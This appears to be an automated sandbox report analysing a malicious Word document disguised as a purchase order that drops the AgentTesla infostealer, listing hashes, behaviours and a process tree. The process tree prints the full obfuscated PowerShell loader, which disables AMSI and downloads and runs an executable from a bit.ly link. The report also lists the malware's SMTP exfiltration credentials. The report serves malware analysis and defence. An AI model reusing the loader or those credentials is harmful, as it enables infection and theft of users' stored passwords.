Analysis
-
max time kernel
135s -
max time network
131s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-03-2021 14:09
Static task
static1
Behavioral task
behavioral1
Sample
ABSURY CHINA PO#200929H3246.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ABSURY CHINA PO#200929H3246.doc
Resource
win10v20201028
General
-
Target
ABSURY CHINA PO#200929H3246.doc
-
Size
137KB
-
MD5
ac33ee5032e398b9c27377762e1f7f17
-
SHA1
56089cc1a763cf6a078babee414ff6b9ab522a8a
-
SHA256
de1ec15823c3d7078339d1211ffeafd491e23c409d8d55dcc25c552beb9d3c5b
-
SHA512
4e883ecf884c46686dcd8ffa4392a1b549b0d3d4bbea9c3c07a9a421546168724da2e9b98030aed1bb99c6dee5f8cd8ae075bac4e14126bc7b7d1a61b3afde51
Malware Config
Extracted
https://bit.ly/3cnqYgk
Extracted
agenttesla
Protocol: smtp- Host:
smtp.rdnsanom.xyz - Port:
587 - Username:
[email protected] - Password:
O?qr3+lOv9j_
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 200 648 powershell.exe WINWORD.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral2/memory/3184-26-0x000000000043746E-mapping.dmp family_agenttesla -
Beds Protector Packer 1 IoCs
Detects Beds Protector packer used to load .NET malware.
Processes:
resource yara_rule behavioral2/memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmp beds_protector -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 14 200 powershell.exe 16 200 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
mznfchhemyw.exemznfchhemyw.exepid process 2556 mznfchhemyw.exe 3184 mznfchhemyw.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
mznfchhemyw.exedescription pid process target process PID 2556 set thread context of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 648 WINWORD.EXE 648 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exemznfchhemyw.exepid process 200 powershell.exe 200 powershell.exe 200 powershell.exe 3184 mznfchhemyw.exe 3184 mznfchhemyw.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WINWORD.EXEpid process 648 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exemznfchhemyw.exedescription pid process Token: SeDebugPrivilege 200 powershell.exe Token: SeDebugPrivilege 3184 mznfchhemyw.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE 648 WINWORD.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WINWORD.EXEpowershell.exemznfchhemyw.exedescription pid process target process PID 648 wrote to memory of 200 648 WINWORD.EXE powershell.exe PID 648 wrote to memory of 200 648 WINWORD.EXE powershell.exe PID 200 wrote to memory of 2556 200 powershell.exe mznfchhemyw.exe PID 200 wrote to memory of 2556 200 powershell.exe mznfchhemyw.exe PID 200 wrote to memory of 2556 200 powershell.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe PID 2556 wrote to memory of 3184 2556 mznfchhemyw.exe mznfchhemyw.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ABSURY CHINA PO#200929H3246.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $sSIlTYNjhraqEeSxwG=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,84,81,78,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,49,50,52,55,48,45,51,51,57,52,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,99,72,65,82,93,40,91,66,121,116,101,93,48,120,52,49,41,43,91,99,72,97,82,93,40,91,66,89,84,69,93,48,120,54,68,41,43,91,67,72,97,114,93,40,91,98,89,84,69,93,48,120,55,51,41,43,91,67,104,65,114,93,40,91,98,121,116,69,93,48,120,54,57,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,67,72,97,82,93,40,91,98,89,116,101,93,48,120,54,49,41,43,91,67,104,97,82,93,40,91,98,89,84,101,93,48,120,54,68,41,43,91,67,104,97,82,93,40,49,52,56,45,51,51,41,43,91,99,72,65,114,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,84,81,78,41,59,125,101,108,115,101,32,123,125,59,36,99,108,105,101,110,116,32,61,32,110,101,119,45,111,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,59,36,97,32,61,32,39,104,116,116,112,115,58,47,47,98,105,116,46,108,121,47,51,99,110,113,89,103,107,39,46,83,112,108,105,116,40,39,44,39,41,59,36,104,117,97,115,32,61,32,36,101,110,118,58,116,101,109,112,32,43,32,39,92,109,122,110,102,99,104,104,101,109,121,119,46,101,120,101,39,59,102,111,114,101,97,99,104,40,36,98,32,105,110,32,36,97,41,123,116,114,121,123,36,99,108,105,101,110,116,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,98,46,84,111,83,116,114,105,110,103,40,41,44,32,36,104,117,97,115,41,59,73,110,118,111,107,101,45,73,116,101,109,40,36,104,117,97,115,41,59,98,114,101,97,107,59,125,99,97,116,99,104,123,119,114,105,116,101,45,104,111,115,116,32,36,95,46,69,120,99,101,112,116,105,111,110,46,77,101,115,115,97,103,101,125,125,59);[System.Text.Encoding]::ASCII.GetString($sSIlTYNjhraqEeSxwG)|&('I'+'EX');2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exeMD5
63332ea9e6fd6bfc2275a0bc7887e406
SHA15acd50123e20554be8a9bbd16d4cc367bb7ab81b
SHA256c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2
SHA51291f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2
-
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exeMD5
63332ea9e6fd6bfc2275a0bc7887e406
SHA15acd50123e20554be8a9bbd16d4cc367bb7ab81b
SHA256c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2
SHA51291f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2
-
C:\Users\Admin\AppData\Local\Temp\mznfchhemyw.exeMD5
63332ea9e6fd6bfc2275a0bc7887e406
SHA15acd50123e20554be8a9bbd16d4cc367bb7ab81b
SHA256c47d08441b68cd06b3d2f09c22891f4ec1b9953ec735e3fb82a6e55543bb4db2
SHA51291f30a309b1cb9499263269bca87bfdf816e063dfde5ca9bb190665029add4c6eb8d1a1968a80bf5fcf118386034ad91cb0288295865bef5e15aa850c16a71a2
-
memory/200-9-0x0000026CC4D90000-0x0000026CC4D92000-memory.dmpFilesize
8KB
-
memory/200-7-0x0000000000000000-mapping.dmp
-
memory/200-8-0x00007FF8454F0000-0x00007FF845EDC000-memory.dmpFilesize
9.9MB
-
memory/200-10-0x0000026CC4D93000-0x0000026CC4D95000-memory.dmpFilesize
8KB
-
memory/200-11-0x0000026CC6760000-0x0000026CC6761000-memory.dmpFilesize
4KB
-
memory/200-12-0x0000026CDED70000-0x0000026CDED71000-memory.dmpFilesize
4KB
-
memory/200-13-0x0000026CC4D96000-0x0000026CC4D98000-memory.dmpFilesize
8KB
-
memory/648-6-0x00007FF82D760000-0x00007FF82D770000-memory.dmpFilesize
64KB
-
memory/648-2-0x00007FF82D760000-0x00007FF82D770000-memory.dmpFilesize
64KB
-
memory/648-3-0x00007FF82D760000-0x00007FF82D770000-memory.dmpFilesize
64KB
-
memory/648-5-0x000002AE3ED50000-0x000002AE3F387000-memory.dmpFilesize
6.2MB
-
memory/648-4-0x00007FF82D760000-0x00007FF82D770000-memory.dmpFilesize
64KB
-
memory/2556-18-0x0000000000C20000-0x0000000000C21000-memory.dmpFilesize
4KB
-
memory/2556-14-0x0000000000000000-mapping.dmp
-
memory/2556-20-0x0000000005D30000-0x0000000005D31000-memory.dmpFilesize
4KB
-
memory/2556-21-0x0000000005700000-0x0000000005701000-memory.dmpFilesize
4KB
-
memory/2556-22-0x0000000005830000-0x0000000005AA0000-memory.dmpFilesize
2.4MB
-
memory/2556-23-0x0000000005B40000-0x0000000005B41000-memory.dmpFilesize
4KB
-
memory/2556-24-0x00000000057E0000-0x00000000057EF000-memory.dmpFilesize
60KB
-
memory/2556-17-0x0000000073FF0000-0x00000000746DE000-memory.dmpFilesize
6.9MB
-
memory/2556-27-0x00000000057F0000-0x00000000057F1000-memory.dmpFilesize
4KB
-
memory/3184-26-0x000000000043746E-mapping.dmp
-
memory/3184-25-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/3184-29-0x0000000073FF0000-0x00000000746DE000-memory.dmpFilesize
6.9MB
-
memory/3184-34-0x0000000005200000-0x0000000005201000-memory.dmpFilesize
4KB
-
memory/3184-35-0x0000000005520000-0x0000000005521000-memory.dmpFilesize
4KB
-
memory/3184-36-0x0000000005BB0000-0x0000000005BB1000-memory.dmpFilesize
4KB
-
memory/3184-38-0x00000000007B0000-0x00000000007B1000-memory.dmpFilesize
4KB